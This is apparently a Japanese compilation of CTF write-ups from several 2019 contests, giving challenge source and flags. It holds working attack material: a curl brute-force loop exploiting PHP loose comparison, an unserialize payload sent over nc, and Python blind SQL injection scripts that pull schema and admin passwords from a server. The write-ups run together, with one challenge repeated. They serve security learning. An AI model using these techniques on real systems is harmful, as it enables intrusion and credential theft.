提示されたURLにアクセスするとcoolボタンが設置されたページが表示されます。coolボタンをクリックすると連続的にページがリダイレクトされます。その中のcool9のリクエストにフラグがあります。Long road
(45 points, solved by 114)
Description: website is at http://cbmctf2019.cf:5000
フラグは、
cbmctf{tracking_redirects!!}です。
提示されたURLにアクセスするとcoolボタンが設置されたページが表示されます。coolボタンをクリックすると連続的にページがリダイレクトされます。その中のcool9のリクエストにフラグがあります。Long road
(45 points, solved by 114)
Description: website is at http://cbmctf2019.cf:5000
cbmctf{tracking_redirects!!}です。
Points: 115
Solves: 136
Someone told me to use a lib, but real developers rock regex one-liners.http://marcodowno-01.play.midnightsunctf.se:3001Service:
Author: avlidienbrunn is available for questions in #midnightsun @ freenode入力値を以下のjavascriptで置換して出力しています。
Status: Online, last check at 2019-04-06 06:47:05 UTC
markdownでimgタグのalt属性に該当する部分がそのまま出力されるためこれを利用してXSSを起こします。function markdown(text){text = text.replace(/[<]/g, '').replace(/----/g,'<hr>').replace(/> ?([^\n]+)/g, '<blockquote>$1</blockquote>').replace(/\*\*([^*]+)\*\*/g, '<b>$1</b>').replace(/__([^_]+)__/g, '<b>$1</b>').replace(/\*([^\s][^*]+)\*/g, '<i>$1</i>').replace(/\* ([^*]+)/g, '<li>$1</li>').replace(/##### ([^#\n]+)/g, '<h5>$1</h5>').replace(/#### ([^#\n]+)/g, '<h4>$1</h4>').replace(/### ([^#\n]+)/g, '<h3>$1</h3>').replace(/## ([^#\n]+)/g, '<h2>$1</h2>').replace(/# ([^#\n]+)/g, '<h1>$1</h1>').replace(/(?<!\()(https?:\/\/[a-zA-Z0-9./?#-]+)/g, '<a href="$1">$1</a>').replace(/!\[([^\]]+)\]\((https?:\/\/[a-zA-Z0-9./?#]+)\)/g, '<img src="$2" alt="$1"/>').replace(/(?<!!)\[([^\]]+)\]\((https?:\/\/[a-zA-Z0-9./?#-]+)\)/g, '<a href="$2">$1</a>').replace(/`([^`]+)`/g, '<code>$1</code>').replace(/```([^`]+)```/g, '<code>$1</code>').replace(/\n/g, "<br>");return text;}
midnight{wh0_n33ds_libs_wh3n_U_g0t_reg3x?}
URLにアクセスすると下図のページが表示されます。I think I've found something interesting, but I'm not really a PHP expert. Do you think it's exploitable?
<?phpinclude '../func.php';include '../config.php';if (!$_COOKIE['otadmin']) {exit("Not authenticated.\n");}if (!preg_match('/^{"hash": [0-9A-Z\"]+}$/', $_COOKIE['otadmin'])) {echo "COOKIE TAMPERING xD IM A SECURITY EXPERT\n";exit();}$session_data = json_decode($_COOKIE['otadmin'], true);if ($session_data === NULL) { echo "COOKIE TAMPERING xD IM A SECURITY EXPERT\n"; exit(); }if ($session_data['hash'] != strtoupper(MD5($cfg_pass))) {echo("I CAN EVEN GIVE YOU A HINT XD \n");for ($i = 0; i < strlen(MD5('xDdddddd')); i++) {echo(ord(MD5($cfg_pass)[$i]) & 0xC0);}exit("\n");}display_admin();
for i in `seq 0 999`doecho $iout=`curl gameserver.zajebistyc.tf/admin/login.php -b "otadmin={\"hash\": $i"}`echo $outif [ "`echo $out | grep p4{`" ]; then break; fidone
0% Total % Received % Xferd Average Speed Time Time Time CurrentDload Upload Total Spent Left Speed100 78 0 78 0 0 120 0 --:--:-- --:--:-- --:--:-- 120I CAN EVEN GIVE YOU A HINT XD 0006464640640064000646464640006400640640646400(略)389% Total % Received % Xferd Average Speed Time Time Time CurrentDload Upload Total Spent Left Speed100 58 0 58 0 0 160 0 --:--:-- --:--:-- --:--:-- 160Congratulations! p4{wtf_php_comparisons_how_do_they_work}
p4{wtf_php_comparisons_how_do_they_work}
PHP's unserialization mechanism can be exceptional. Guest challenge by jvoisin.
Files at https://35c3ctf.ccc.ac/uploads/php-ff2d1f97076ff25c5d0858616c26fac7.tar. Challenge running at: nc 35.242.207.13 1
<?php$line = trim(fgets(STDIN));$flag = file_get_contents('/flag');class B {function __destruct() {global $flag;echo $flag;}}$a = @unserialize($line);throw new Exception('Well that was unexpected…');echo $a;
>nc.exe 35.242.207.13 1O:1:"B":135C3_php_is_fun_php_is_funPHP Fatal error: Uncaught Exception: Well that was unexpected… in /home/user/php.php:16Stack trace:#0 {main}thrown in /home/user/php.php on line 16
35C3_php_is_fun_php_is_fun
<?phperror_reporting(0);$fav_id = !empty($_GET['id']) ? $_GET['id'] : '1';header("Content-Type: image/x-icon");header("Pragma-directive: no-cache");header("Cache-directive: no-cache");header("Cache-control: no-cache");header("Cache-Control: no-store");header("Pragma: no-cache");header("Expires: 0");$favicon = $fav_id;$filepath = "./favicons/".$favicon;if(file_exists($filepath . ".png")) {$favicon = $filepath . ".png";}else if (file_exists($filepath . ".php")) {$favicon = $filepath . ".php";}else if (file_exists($filepath . ".ico")) {$favicon = $filepath . ".ico";}else {$err_msg = "No files named '$filepath.png', '$filepath.ico' or '$filepath.php' found ";echo $err_msg;die();}if(!file_exists($favicon)) {echo "File '$filepath' does not exist";die();}readfile($favicon);?>
<!DOCTYPE html><html><head><?php$favicon_id = mt_rand(1,7);echo "<link rel='shortcut icon' href='favicon.php?id=$favicon_id' type='image/x-icon'>";?><meta charset="UTF-8"><title>El33t Articles Hub</title><link rel="stylesheet" href="css/bootstrap.min.css"><style type="text/css">#container {background-color: #fcf3cf ;width: 60%;border: 1px solid grey;padding: 10px;margin: auto;margin-top: 10px;margin-bottom: 30px;}#container p {padding: 10px;font-size: 16px;}#header {height: 100px;margin: 20px;text-align: center;font-size: 24px;}body {background-color: #f9e79f ;}</style></head><body><div id='header'><b><u> El33t Articles Hub </u> </b></div><div id='container'><?phperror_reporting(0);require "fetch.php";require "helpers.php";$filename = !empty($_GET['file']) ? $_GET['file'] : "";if($filename !== "") {$filename = sanitize($filename);$file_contents = read_article($filename);echo "<p>";echo $file_contents;echo "</p>";}else {$files = scandir('./articles');echo "<ul>";foreach($files as $i) {$temp = new SplFileInfo($i);$ext = $temp->getExtension();if($ext !== "txt")continue;$t = explode(".txt", $i)[0];echo "<li><h4><a href='?file=$t'> $t </a> </h4></li>";}echo "</ul>";}?></div><center><p> Copywrite © El33t Articles Hub </p></center></body></html>
<?phpfunction article_not_found($name) {echo "<br><center>";echo "File \"$name\" not found !!";echo "</center>";die();}function sanitize($filename) {$evil_chars = array("php:", "secret/flag_7258689d608c0e2e6a90c33c44409f9d");foreach ($evil_chars as $value) {if( strpos($filename, $value) !== false) {echo "You naughty cheat !!<br>";die();}}// Sanitize input file name$bad_chars = array("./", "../");foreach ($bad_chars as $value) {$filename = str_replace($value, "", $filename);}$temp = new SplFileInfo($filename);$ext = $temp->getExtension();if( $ext !== "txt") {$filename = $filename.".txt";}return $filename;}?>
pctf{1h3-v41id41i0n_SuCk3d~r34l-baD}です。
<?phpsession_start();require "helpers.php";if(! check_login())redirect($LOGIN_URL);$id_type = $_SESSION['id_type'];$id = $_SESSION['id'];?><!DOCTYPE html><html><head><title>Homepage</title></head><body style='background-color: #d6eaf8'><p style="float: right"><a href='/logout.php'> Logout </a></p><p style="clear: both"></p><p style='height:30px; width:100%;'> </p><center><h2> Welcome User !! </h2><br><br><h3><?phpif($id_type === 'email') {echo "Email :- ".$id;}elseif ($id_type === 'team_name'){echo "Team Name :- ".$id ;}?></h3><br><br><h4>Here's a random funny saying for you :) <br></h4><br><br><?phprequire "sayings.php";printf(get_random_saying());echo "<br><br>";if($id === 'admin' && $id_type === 'team_name')printf(output_flag());?></center></body></html>
<?phpsession_start();require "helpers.php";$type = $_POST['id_type'];$identifier = $_POST['identifier'];$password = $_POST['password'];$_SESSION['id'] = $identifier;if($type === 'team_name') {$team_name = $identifier;$_SESSION['id_type'] = 'team_name';if(verify_teamname_password($team_name, $password) === true) {$_SESSION['logged_in'] = true;redirect('/homepage.php');}else {die("Invalid Team Name-Password combination !!");}}elseif ($type === 'email') {$email = $identifier;$_SESSION['id_type'] = 'email';if(verify_email_password($email, $password) === true) {$_SESSION['logged_in'] = true;redirect('/homepage.php');}else {die("Invalid Email-Password combination !!");}}?>
pctf{4u1h3ntic4Ti0n.4nd~4u1horiz4ti0n_diff3r}
このPythonスクリプトを実行すると、時間がかかりますが次の結果が得られます。import urllibimport urllib2import base64url = 'http://128.199.224.175:24000/'table = ''sql = "0' or ord(substr((select group_concat(table_name,':',column_name) from information_schema.columns where table_schema=database()),{},1))>{} #"for pos in range(1, 200):for c in range(32, 127):sqli = sql.format(pos, c)params = { 'spy_name': base64.b64encode(sqli) }params = urllib.urlencode(params)req = urllib2.Request(url)req.add_header('test', 'application/x-www-form-urlencoded')req.add_data(params)res = urllib2.urlopen(req)r = res.read()if len(r) < 8000:table = table + chr(c)print(table)break
”users”テーブルが存在し、”username”、”password”というカラムが存在することがわかります。同じ手法で”users”テーブルの情報を取得します。$ python aaa.pysspspispiespiesspies:spies:ispies:id(略)spies:id,spies:name,spies:age,spies:experience,spies:description,users:id,users:username,users:password,users:emal
import urllibimport urllib2import base64url = 'http://128.199.224.175:24000/'table = ''sql = "0' or ord(substr((select group_concat(username,':',password) from users),{},1))>{} #"for pos in range(1, 200):for c in range(32, 127):sqli = sql.format(pos, c)params = { 'spy_name': base64.b64encode(sqli) }params = urllib.urlencode(params)req = urllib2.Request(url)req.add_header('test', 'application/x-www-form-urlencoded')req.add_data(params)res = urllib2.urlopen(req)r = res.read()if len(r) < 8000:table = table + chr(c)print(table)break
$ python bbb.pyaadadmadmiadmin(略)admin:pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?},test:test
pctf{L31's~@Ll_h4il-1h3-c4T_Qu33n.?}です。